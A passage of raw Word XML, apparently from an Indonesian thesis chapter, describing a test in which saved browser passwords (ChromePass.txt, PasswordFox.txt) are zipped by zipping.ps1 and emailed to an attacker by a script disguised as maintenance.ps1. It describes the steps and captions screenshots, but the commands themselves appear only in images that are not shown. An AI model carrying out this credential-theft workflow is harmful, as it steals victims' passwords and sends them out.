+        <w:t xml:space="preserve">Pengujian </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Compress</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Folder</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pada tahap ini data yang telah diambil dari </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>browser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target akan dikirimkan ke </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">email </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">penyerang, namun sebelum itu perlu dilakukan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>compress file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> terhadap kedua </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">file </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.txt yang sebelumnya berhasil dibuat menjadi sebuah </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">file </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.zip. hal ini dilakukan dengan cara menyalin ChromePass.txt dan PasswordFox.txt kedalam folder Password kemudian menjalankan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> zipping.ps1. Pada Gambar V-11 ditampilkan perintah untuk melakukan hal tersebut.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2404FAEE" wp14:editId="0C333D41">
+            <wp:extent cx="4579952" cy="2404215"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="43" name="Picture 43"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId31"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4599111" cy="2414273"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:firstLine="431"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="124" w:name="_Toc43194862"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>13</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Berhasil Menyalin </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">File </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>.txt</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="124"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Setelah kedua </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">file </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.txt berhasil disalin kedalam folder Password maka langkah berikutnya adalah menjalankan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> zipping.ps1 seperti yang ditampilkan pada gambar V-12.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25927BB7" wp14:editId="4D86F4A4">
+            <wp:extent cx="4587903" cy="2406077"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+            <wp:docPr id="44" name="Picture 44"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId32"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4601230" cy="2413066"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1440" w:firstLine="720"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="125" w:name="_Toc43194863"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>14</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>. Baris Perintah Menjalankan zipping.ps1</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="125"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">Pada Gambar V-13 berikut ditampilkan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Password.zip berhasil dibuat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>yang berisi ChromePass.txt dan PasswordFox.txt.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41490BD6" wp14:editId="2FFAF2BF">
+            <wp:extent cx="4420926" cy="2394807"/>
+            <wp:effectExtent l="19050" t="19050" r="17780" b="24765"/>
+            <wp:docPr id="45" name="Picture 45"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId33"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4425938" cy="2397522"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:solidFill>
+                        <a:schemeClr val="tx1"/>
+                      </a:solidFill>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="431"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="126" w:name="_Toc43194864"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>15</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>File</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Password.zip Berhasil Dibuat</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="126"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709" w:firstLine="0"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pengujian </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Mengirim </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Email</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tahap pengiriman </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">email </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dilakukan dengan menjalankan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> maintenance.ps1 dengan menggunakan perintah seperti pada Gambar V-14 berikut ini.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CC5F937" wp14:editId="0B230737">
+            <wp:extent cx="4615398" cy="2425148"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="48" name="Picture 48"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId34"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4649317" cy="2442970"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:left="720" w:firstLine="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="127" w:name="_Toc43194865"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>16</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>. Baris Perintah Menjalankan maintenance.ps1</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="127"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pada gambar diatas dapat dilihat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">berhasil dijalankan, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>email</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> yang berhasil dikirimkan akan diterima oleh penyerang seperti yang ditampilkan pada Gambr V-15 berikut.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64309F2D" wp14:editId="7F0B2FF2">
+            <wp:extent cx="4572000" cy="2169079"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+            <wp:docPr id="49" name="Picture 49"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId35"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
